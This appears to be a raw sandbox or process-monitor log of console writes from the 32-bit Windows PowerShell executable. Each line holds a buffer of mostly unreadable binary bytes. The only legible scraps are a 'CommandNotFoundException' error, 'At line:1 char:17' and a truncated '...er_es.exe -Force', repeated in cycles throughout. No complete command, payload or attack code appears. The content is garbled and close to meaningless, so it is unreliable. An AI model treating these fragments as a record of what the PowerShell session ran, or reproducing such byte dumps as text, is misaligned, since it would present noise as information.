Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......X.w.....2.......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....X...............................................0.......w.......X.w.............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....X...............................................0.......................l.......H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....X...............................................0...............X.w.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....X.......................*.......................0...............X.w.............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....X.......................F.......................0...............X.w.............H...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....p.......................%.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....p.......................K.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....p.......................t.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....p...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....p...............................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....p...............................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7......./.......................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....p.......................J.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....p.......................r.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....p...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_.......e.r._.e.s...e.x.e. .-.F.o.r.c.e.................................0......._............... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....p...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....p...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....p.......................).......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....p.......................p.......................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....p...............................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....p...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....p...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....p...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............l...............t.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............l.......................................0.......#.......8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............l.......................................0......./.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............l.......................................0......./.......8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............l...............'.......................0.......;...............\|.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............l...............W.......................0.......;.......8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......8.......".......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.............l.......................................0.......G.......8...............8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............l.......................................0.......S.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............l...............$.......................0.......S.......8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............l..............._.......................0......._...............~.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............l.......................................0......._.......8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............l.......................................0.......k.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............l.......................................0.......k.......8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......8.......2.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............l.......................................0.......w.......8...............8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............l...............g.......................0.......................l.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............l.......................................0...............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............l.......................................0...............8...............8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............l.......................................0...............8...............8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....P...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....P.......................*.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....P.......................S.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....P.......................p.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....P...............................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....P...............................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....P...............................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....P...............x...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....P...............x.......T.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....P...............x.......\|.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....P...............x...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....P...............x...............................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....P...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....P.......................4.......................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....P.......................`.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....P.......................{.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....P...............H...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....P...............H...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....\...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....\.......................5.......................0.......#.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....\......................._.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....\.......................\|.......................0......./.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....\...............................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....\...............................................0.......;.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........5.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....\...............................................0.......G.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....\.......................9.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....\.......................[.......................0.......S.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....\...............................................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....\...............................................0......._.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....\...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....\...............................................0.......k.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........5.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....\...............`...............................0.......w.........5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....\...............`...............................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....\...............`...............................0.................5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....\...............`...............................0.................5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....\...............`...............................0.................5.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....T.......\.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....T.......\.......`...............................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....T.......\...............!.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....T.......\...............<.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....T.......\.......`.......q.......................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....T.......\.......`...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....T.......\.......................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....T.......\.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....T.......\...............&.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....T.......\...............^.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....T.......\...............{.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....T.......\.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....T.......\.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....T.......\...............$.......................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....T.......\...............R.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....T.......\.......................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....T.......\.......L...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....T.......\.......L...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............................<.......................0.......#.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............................k.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....................................................0......./.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P............................. .......................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............................T.......................0.......;.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........}.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................8...............................0.......G.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............................#.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............................\.......................0.......S.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................8...............................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................8...............................0......._.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................8.......!.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........}.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............................=.......................0.......w.........}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.................}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................................................0.................}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................6.......................0.................}.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....`...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....`...............................................0.......#.......x.\|.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....`...............................................0......./.......................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....`...............8...............................0......./.......x.\|.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....`.......................z.......................0.......;...............\|.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....`...............................................0.......;.......x.\|.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......B.......................0.......G.......x.\|.....".......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....`.......................`.......................0.......G.......x.\|.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....`...............................................0.......S.......................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....`...............................................0.......S.......x.\|.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....`.......................<.......................0......._.......................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....`.......................z.......................0......._.......x.\|.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....`...............................................0.......k.......................X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....`.......................,.......................0.......k.......x.\|.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.\|.....2.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....`...............................................0.......w.......x.\|.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`...............................................0.......................l.......X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`...............................................0...............x.\|.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....`...............................................0...............x.\|.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....`.......................#.......................0...............x.\|.............X...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....8.......................^.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....8...............8.......i.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....8...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.....8...............8...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....8...............................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....8.......................^.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....8...............................................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....8.......................&.......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....8...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....8.......................7.......................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....8.......................U.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....8...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....8...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.....8...............................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....8......................./.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....8.......................].......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....8...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....8...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.....................................................0.......#.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............................5.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............................Q.......................0......./.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................................................0.......;...............\|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.....................................................0.......;.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........~.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.....................................................0.......G.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............................G.......................0.......S.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.....................................................0......._.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.....................................................0.......k.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........~.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............................\.......................0.......w.........~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.................~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................................................0.................~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................................................0.................~.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............p.......P...............................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............(.P.............p.......P...............................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............p.......................................0......./.........................&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ......................../...............(.P.............p.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............p...............-.......................0.......;...............\|.........&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................;...............(.P.............p.......P.......S.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".........&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................G...............(.P.............p.......................................0.......G.........................&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............p.......................................0.......S.........................&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................S...............(.P.............p.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............p...............H.......................0......._...............~.........&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................_...............(.P.............p...............e.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............p.......................................0.......k.........................&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................k...............(.P.............p.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.........&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................w...............(.P.............p.......................................0.......w.........................&.............
